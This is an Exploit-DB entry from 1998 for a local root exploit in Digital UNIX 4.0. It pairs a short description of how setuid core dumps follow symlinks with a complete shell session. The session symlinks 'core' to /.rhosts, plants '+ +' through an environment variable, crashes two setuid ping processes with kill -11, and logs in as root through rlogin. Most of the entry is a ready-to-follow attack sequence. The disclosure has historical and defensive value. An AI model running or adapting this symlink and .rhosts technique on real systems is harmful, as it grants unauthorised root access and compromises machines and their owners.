Digital UNIX 4.0/4.0 B/4.0 D SUID/SGID Core File Vulnerability

1998-04-06T00:00:00
ID EDB-ID:19068
Type exploitdb
Reporter ru5ty and SoReN
Modified 1998-04-06T00:00:00

Description

Digital UNIX 4.0/4.0 B/4.0 D SUID/SGID Core File Vulnerability. Local exploit for unix platform

                                        
                                            source: http://www.securityfocus.com/bid/74/info

Digital UNIX 4.0 will follow symlinks while writting core files if two setuid programs dump core in sucession. The core file is owned by root but with the user's groud id. The core file permissions are 0600. This can be used to create root owned file anywhere in the filesystem.

$ ls -l /.rhosts
/.rhosts not found
$ ls -l /usr/sbin/ping
-rwsr-xr-x 1 root bin 32768 Nov 16 1996 /usr/sbin/ping
$ ln -s /.rhosts core
$ IMP='
>+ +
>'
$ ping somehost &
[1] 1337
$ ping somehost &
[2] 31337
$ kill -11 31337
$ kill -11 1337
[1] Segmentation fault /usr/sbin/ping somehost (core dumped)
[2] +Segmentation fault /usr/sbin/ping somehost (core dumped)
$ ls -l /.rhosts
-rw------- 1 root system 385024 Mar 29 05:17 /.rhosts
##/.rhosts has been created....that's all.##
$ rlogin localhost -l root